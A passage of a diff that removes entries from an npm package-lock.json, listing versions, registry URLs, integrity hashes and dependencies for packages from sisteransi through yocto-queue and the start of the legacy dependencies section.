"sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.2.tgz", - "integrity": "sha512-VE0SOVEHCk7Qc8ulkWw3ntAzXuqf7S2lvwQaDLRnUeIEaKNQJzV6BwmLKhOqT61aGhfUMrXeaBk+oDGCzvhcug==" - }, - "node_modules/sshpk": { - "version": "1.17.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", - "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", - "dependencies": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - }, - "bin": { - "sshpk-conv": "bin/sshpk-conv", - "sshpk-sign": "bin/sshpk-sign", - "sshpk-verify": "bin/sshpk-verify" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/sshpk/node_modules/jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/stack-utils/node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", - "engines": { - "node": ">= 0.10.0" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/tar": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", - "integrity": "sha512-DZ4yORTwrbTj/7MZYq2w+/ZFdI6OZ/f9SFHR+71gIVUZhOQPHzVCLpvRnPgyaMpfWxxk/4ONva3GQSyNIKRv6A==", - "dependencies": { - "chownr": "^2.0.0", - "fs-minipass": "^2.0.0", - "minipass": "^5.0.0", - "minizlib": "^2.1.1", - "mkdirp": "^1.0.3", - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/tar/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "dependencies": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - }, - "engines": { - "node": ">=0.8" - } - }, - "node_modules/tr46": { - "version": "0.0.3", - "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", - "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" - }, - "node_modules/ts-jest": { - "version": "29.1.1", - "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.1.1.tgz", - "integrity": "sha512-D6xjnnbP17cC85nliwGiL+tpoKN0StpgE0TeOjXQTU6MVCfsB4v7aW05CgQ/1OywGb0x/oy9hHFnN+sczTiRaA==", - "dev": true, - "dependencies": { - "bs-logger": "0.x", - "fast-json-stable-stringify": "2.x", - "jest-util": "^29.0.0", - "json5": "^2.2.3", - "lodash.memoize": "4.x", - "make-error": "1.x", - "semver": "^7.5.3", - "yargs-parser": "^21.0.1" - }, - "bin": { - "ts-jest": "cli.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": ">=7.0.0-beta.0 <8", - "@jest/types": "^29.0.0", - "babel-jest": "^29.0.0", - "jest": "^29.0.0", - "typescript": ">=4.3 <6" - }, - "peerDependenciesMeta": { - "@babel/core": { - "optional": true - }, - "@jest/types": { - "optional": true - }, - "babel-jest": { - "optional": true - }, - "esbuild": { - "optional": true - } - } - }, - "node_modules/ts-jest/node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/ts-jest/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/ts-jest/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, - "node_modules/tslib": { - "version": "2.6.0", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.6.0.tgz", - "integrity": "sha512-7At1WUettjcSRHXCyYtTselblcHl9PJFFVKiCAy/bY97+BPZXSQ2wbq0P9s8tK2G7dFQfNnlJnPAiArVBVBsfA==" - }, - "node_modules/tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", - "dependencies": { - "safe-buffer": "^5.0.1" - }, - "engines": { - "node": "*" - } - }, - "node_modules/tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/typescript": { - "version": "4.9.5", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-4.9.5.tgz", - "integrity": "sha512-1FXk9E2Hm+QzZQ7z+McJiHL4NW1F2EzMu9Nq9i3zAaGqibafqYwCVU6WyWAuyQRRzOlxou8xZSyXLEN8oKj24g==", - "dev": true, - "bin": { - "tsc": "bin/tsc", - "tsserver": "bin/tsserver" - }, - "engines": { - "node": ">=4.2.0" - } - }, - "node_modules/undici-types": { - "version": "5.26.5", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", - "integrity": "sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==" - }, - "node_modules/update-browserslist-db": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.11.tgz", - "integrity": "sha512-dCwEFf0/oT85M1fHBg4F0jtLwJrutGoHSQXCh7u4o2t1drG+c0a9Flnqww6XUKSfQMPpJBRjU8d4RXB09qtvaA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - }, - "bin": { - "update-browserslist-db": "cli.js" - }, - "peerDependencies": { - "browserslist": ">= 4.21.0" - } - }, - "node_modules/uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dependencies": { - "punycode": "^2.1.0" - } - }, - "node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", - "bin": { - "uuid": "bin/uuid" - } - }, - "node_modules/v8-to-istanbul": { - "version": "9.1.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", - "integrity": "sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/v8-to-istanbul/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", - "engines": [ - "node >=0.6.0" - ], - "dependencies": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/webidl-conversions": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", - "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" - }, - "node_modules/whatwg-url": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", - "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", - "dependencies": { - "tr46": "~0.0.3", - "webidl-conversions": "^3.0.0" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "node_modules/write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || >=16.0.0" - } - }, - "node_modules/ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", - "engines": { - "node": ">=10.0.0" - }, - "peerDependencies": { - "bufferutil": "^4.0.1", - "utf-8-validate": ">=5.0.2" - }, - "peerDependenciesMeta": { - "bufferutil": { - "optional": true - }, - "utf-8-validate": { - "optional": true - } - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "node_modules/yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@ampproject/remapping": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", - "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", - "dev": true, - "requires": { - "@jridgewell/gen-mapping": "^0.3.0", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", - "dev": true, - "requires": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/compat-data": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.22.6.tgz", - "integrity": "sha512-29tfsWTq2Ftu7MXmimyC0C5FDZv5DYxOZkh3XD3+QW4V/BYuv/LyEsjj3c0hqedEaDt6DBfDvexMKU8YevdqFg==", - "dev": true - }, - "@babel/core": { - "version": "7.22.8", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.22.8.tgz", - "integrity": "sha512-75+KxFB4CZqYRXjx4NlR4J7yGvKumBuZTmV4NV6v09dVXXkuYVYLT68N6HCzLvfJ+fWCxQsntNzKwwIXL4bHnw==", - "dev": true, - "requires": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.22.5", - "@babel/generator": "^7.22.7", - "@babel/helper-compilation-targets": "^7.22.6", - "@babel/helper-module-transforms": "^7.22.5", - "@babel/helpers": "^7.22.6", - "@babel/parser": "^7.22.7", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.8", - "@babel/types": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": 